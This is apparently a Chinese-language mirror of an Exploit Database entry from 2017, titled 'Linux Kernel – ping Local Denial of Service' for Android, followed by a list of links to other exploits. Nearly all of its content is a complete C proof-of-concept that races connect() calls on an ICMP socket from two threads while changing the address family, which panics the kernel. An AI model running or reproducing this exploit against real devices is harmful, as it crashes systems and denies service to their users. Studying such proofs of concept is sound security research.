Linux Kernel – ‘ping’ Local Denial of Service

Exploit Database
15 阅读

作者： Daniel Jiang

日期： 2017-06-07
类别：
- dos
平台：
- android
来源：https://www.exploit-db.com/exploits/42135/

// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
static int sockfd = 0;
static struct sockaddr_in addr = {0};

void fuzz(void * param){
while(1){
addr.sin_family = 0;//rand()%42;
printf("sin_family1 = %08lx\n", addr.sin_family);
connect(sockfd, (struct sockaddr *)&addr, 16); 
}
}
int main(int argc, char **argv)
{
sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
int thrd;
pthread_create(&thrd, NULL, fuzz, NULL);
while(1){
addr.sin_family = 0x1a;//rand()%42;
addr.sin_port = 0;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
connect(sockfd, (struct sockaddr *)&addr, 16);
addr.sin_family = 0;
}
return 0;
}

last Exploits
Linux Kernel – ‘ping’ Local Denial of Service的更多信息

ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities：
Microsoft Windows – ‘IOCTL_DISK_GET_DRIVE_GEOMETRY_EX’ Kernel partmgr Pool Memory Disclosure：
Microsoft Windows 10 BasicRender.sys – Denial of Service (PoC)：
Apple macOS – Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkConfig：
FastStone Image Viewer 4.6 – ReadAVonIP Crash (PoC)：
RemShutdown 2.9.0.0 – ‘Key’ Denial of Service (PoC)：
Asterisk 13.17.2 – ‘chan_skinny’ Remote Memory Corruption：
PDF-XChange Viewer 2.5.315.0 – Shading Type 7 Heap Memory Corruption：